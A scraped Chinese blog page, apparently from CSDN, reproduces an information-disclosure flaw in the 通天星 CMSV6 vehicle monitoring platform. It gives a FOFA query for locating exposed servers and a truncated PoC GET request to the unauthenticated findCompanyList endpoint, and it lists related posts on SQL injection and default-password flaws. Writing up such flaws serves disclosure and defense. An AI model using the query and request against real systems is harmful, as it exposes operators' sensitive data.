【漏洞复现】通天星CMSV6车载监控平台CompanyList信息泄露漏洞

最新推荐文章于 2024-07-26 14:54:31 发布

晚风不及你ღ

最新推荐文章于 2024-07-26 14:54:31 发布

阅读量244

点赞数 4

文章标签： web安全

本文链接：https://blog.youkuaiyun.com/qq_37113223/article/details/138175434

版权

【漏洞复现】专栏收录该内容

150 篇文章

已下架不支持订阅

本文详细介绍了通天星CMSV6车载监控平台的CompanyList信息泄露漏洞，该漏洞源于平台的findCompanyList功能，允许攻击者通过特定搜索语法获取敏感信息。漏洞涉及产品包括车载录像机、单兵录像机等，并提供了漏洞POC和复现步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述：

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队，专注于为定位、无线视频终端产品提供平台服务，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台存在findCompanyList信息泄露漏洞，导致攻击者可以获取敏感信息。

搜索语法:

Fofa-Query: web.body="/808gps/"

漏洞详情：

1.通天星CMSV6车载视频监控平台。

2.漏洞POC：

GET /StandardApiAction_findCompanyList.action HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:90.0) Gecko/20100101 Firef

了解本专栏

已下架不支持订阅

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

4
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

已下架不支持订阅

【漏洞复现】通天星CMSV6车载监控平台Login弱口令漏洞

晚风不及你

04-25

199

通天星CMSV6车载视频监控平台存在弱口令漏洞，导致攻击者通过此漏洞登录系统获取敏感信息。

通天星CMSV6车载视频监控平台disable接口处存在SQL注入漏洞 [附POC]

薛定谔嘚喵博客

07-23

391

通天星CMSV6车载视频监控平台disable存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

参与评论您还未登录，请先登录后发表或查看评论

通天星CMSV6车载视频监控平台 downloadLogger.action 任意文件读取漏洞复现

0xSec

04-11

699

通天星CMSV6车载视频监控平台downloadLogger.action接口处任意文件读取漏洞，未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息，使系统处于极不安全状态。

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞复现

0xSec

06-24

1233

2024年5月，通天星CMSV6发布新版本修复了一处SQL注入漏洞。漏洞是由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行，获取服务器权限。建议及时修复漏洞。

通天星CMSV6车载视频监控平台默认口令漏洞

weixin_43567873的博客

03-28

345

通天星CMSV6车载视频监控平台默认口令漏洞

通天星CMSV6车载监控平台CompanyList信息泄露漏洞

weixin_45653478的博客

06-29

751

通天星CMSV6 车载视频监控平台 信息泄露漏洞

qq_69775412的博客

03-15

839

通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞。

【漏洞复现】通天星CMSV6车载视频监控平台 druid存在默认口令漏洞

https://blog.echo234.cn/

03-27

556

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 druid存在默认口令漏洞。

通天星CMSV6车载定位监控平台 SQL注入漏洞复现(XVE-2023-23744)

0xSec

03-15

1083

该漏洞是由于通天星CMSV6车载定位监控平台/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。

【漏洞复现】通天星CMSV6车载视频监控平台存在文件上传漏洞

https://blog.echo234.cn/

03-27

1973

【漏洞复现】通天星CMSV6车载视频监控平台 disable存在SQL注入

weixin_54799594的博客

07-26

1173

漏洞复现过程中的笔记

【漏洞复现】通天星CMSV6车载监控平台Druid弱口令漏洞

晚风不及你

04-25

320

通天星CMSV6车载视频监控平台存在Druid弱口令漏洞，导致攻击者通过此漏洞登录系统获取敏感信息。

【漏洞复现】通天星CMSV6车载监控平台ids SQL注入漏洞

晚风不及你

04-25

270

通天星CMSV6车载视频监控平台/run_stop/delete.do;downloadLogger.action文件ids参数存在SQL注入漏洞，攻击者可以通过此漏洞获取数据库信息。

【漏洞复现】通天星CMSV6车载定位监控平台 downloadLogger.action SQL注入漏洞

https://blog.echo234.cn/

03-25

619

通天星CMSV6车载定位监控平台 SQL注入漏洞复现（含nuclei-poc）

m0_50797689的博客

03-18

499

通天星CMSV6车载定位监控平台 SQL注入漏洞复现（含nuclei-poc）

通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞